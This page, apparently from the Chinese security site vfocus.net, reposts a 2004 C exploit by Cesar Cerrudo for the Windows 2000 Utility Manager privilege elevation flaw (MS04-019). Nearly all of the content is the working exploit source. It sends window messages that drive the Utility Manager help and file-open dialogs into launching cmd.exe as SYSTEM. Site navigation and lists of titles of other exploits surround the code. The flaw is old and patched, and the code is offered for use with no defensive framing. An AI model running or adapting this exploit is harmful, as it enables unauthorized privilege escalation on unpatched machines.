首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Win2k Utility Manager Privilege Elevation Exploit
来源:vfocus.net 作者:Cesar 发布时间:2004-07-16  

Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019)


//by Cesar Cerrudo sqlsec at yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.

#include "stdio.h"
#include "windows.h"


int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char sText[]="%windir%\\system32\\cmd.ex?";

// run utility manager
// system("utilman.exe /start");
// Sleep(500);

lHandle=FindWindow(NULL, "Utility manager");
if (!lHandle) {
printf("\nUsage :\nPress Win Key+U to launch Utility Manager and then
run UtilManExploit2.exe\n");
return 0;
}

PostMessage(lHandle,0x313,NULL,NULL); //=right click on the app button
in the taskbar or Alt+Space Bar

Sleep(100);

SendMessage(lHandle,0x365,NULL,0x1); //send WM_COMMANDHELP 0x0365
lParam must be <>NULL
Sleep(300);

SendMessage (FindWindow(NULL, "Windows Help"), WM_IME_KEYDOWN,
VK_RETURN, 0);
Sleep(500);


// find open file dialog window
lHandle = FindWindow("#32770","Open");

// get input box handle
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);

// set text to filter listview to display only cmd.exe
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);

// send return
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

//get navigation bar handle
lHandle2 = GetDlgItem(lHandle, 0x4A0);

//send tab
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
//get list view handle
lHandle2 = GetDlgItem(lHandle2, 0x1);

SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
Sleep(500);

//popup context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);

// get context menu handle
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);

SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
Sleep(500);
SendMessage (FindWindow(NULL, "Windows Help"), WM_CLOSE, 0, 0);//
close open error window
SendMessage (FindWindow(NULL, "Utility manager"), WM_CLOSE, 0, 0);//
close utility manager
return 0;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft IE Remote Wscript.Sh
·MPlayer buffer overflow for UN
·MySQL Authentication Bypass Ex
·Win2k Universal language Utili
·Microsoft IE Remote Applicatio
·Win2k Utility Manager all in o
·FreeBSD Local DoS Exploit
·WinNT/2k POSIX Subsystem Privi
·phpMyAdmin PHP Code Injection
·Win2K/XP Task Scheduler .job E
·MPlayer GUI filename handling
·Apache 1.3.* find users exploi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved